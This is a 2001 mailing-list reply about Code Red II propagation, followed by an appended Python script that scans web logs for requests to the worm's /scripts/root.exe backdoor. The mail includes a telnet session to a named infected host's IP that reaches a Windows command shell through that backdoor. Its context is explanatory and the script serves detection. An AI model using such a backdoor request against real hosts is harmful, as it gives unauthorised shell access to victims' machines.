Re: Code red II propagation.
- To: linux-il(at-nospam)linux.org.il
- Subject: Re: Code red II propagation.
- From: "Nadav Har'El" <nyh(at-nospam)math.technion.ac.il>
- Date: Sun, 5 Aug 2001 16:51:32 +0300
- Delivered-To: linux.org.il-linux-il@linux.org.il
- Hebrew-Date: 16 Av 5761
- In-Reply-To: <20010805163452.A773@insomia17>; from yotam@makif.omer.k12.il on Sun, Aug 05, 2001 at 04:34:52PM +0300
- References: <20010805163452.A773@insomia17>
- Sender: linux-il-bounce(at-nospam)cs.huji.ac.il
- User-Agent: Mutt/1.2i
On Sun, Aug 05, 2001, Yotam Rubin wrote about "Code red II propagation.":
> Oh yeah, BTW, the new worm also leaves a nice little trojan on the infected
> host so any little script kiddie can just grep his logs and find machines
> to abuse.
Yes, which is why it is not recommended to pass around IP lists of CRII
victims... BTW, not all IP addresses you listed seem to be infected with
the new variant - some seem to (still) have the original one.
The backdoor the worm installs is ridiculously simple and evil. All you need
to do is telnet to the machine on port 80, say open sesame, and you have a
shell! For example, taking one of the IP addresses you list,
$ telnet 192.117.188.211 80
Trying 192.117.188.211...
Connected to 192.117.188.211.
Escape character is '^]'.
GET /scripts/root.exe
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 14:48:38 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
That's bad ;) 100,000 more zombies on the Internet :(
--
Nadav Har'El | Sunday, Aug 5 2001, 16 Av 5761
nyh@math.technion.ac.il |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |Hi! I'm a signature virus! Copy me into
http://nadav.harel.org.il |your signature to help me spread!
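As an added example (not part of the mail above), here is a small log check a server admin could run to see whether anyone is requesting the root.exe backdoor path the mail describes, and whether the server answered it with a 200 as in the session above. The log lines are constructed, and the Apache combined log format is an assumption (an IIS W3C log would need a different regex).

```python
import re
from typing import Dict, List, Optional

# Constructed sample lines in Apache/NCSA combined log format (not real traffic).
# Assumption: the server logs in this format; IIS W3C logs need a different regex.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Aug/2001:14:48:38 +0000] "GET /scripts/root.exe HTTP/1.0" 200 512 "-" "-"
198.51.100.9 - - [05/Aug/2001:14:50:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
203.0.113.7 - - [05/Aug/2001:14:51:12 +0000] "GET /SCRIPTS/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# The backdoor path named in the mail above.
BACKDOOR_PATH = "/scripts/root.exe"


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_backdoor_request(path: str) -> bool:
    # Drop the query string and compare case-insensitively: IIS paths are
    # case-insensitive, so /SCRIPTS/root.exe reaches the same file.
    return path.split("?", 1)[0].lower() == BACKDOOR_PATH


def find_backdoor_requests(log_text: str) -> List[dict]:
    """All requests for the backdoor path. 'answered' is True when the server
    replied 200 (it served root.exe, as in the session above); a 404 means the
    host was probed but is not exposing the backdoor."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_backdoor_request(rec["path"]):
            rec["answered"] = rec["status"] == 200
            hits.append(rec)
    return hits


def count_by_source(hits: List[dict]) -> Dict[str, int]:
    """Backdoor requests per source IP, for a quick triage summary."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts
```

A 200 hit on this path is the signal to take the host offline and rebuild it; the mail's point that victim IP lists should not be circulated applies equally to the output of this script.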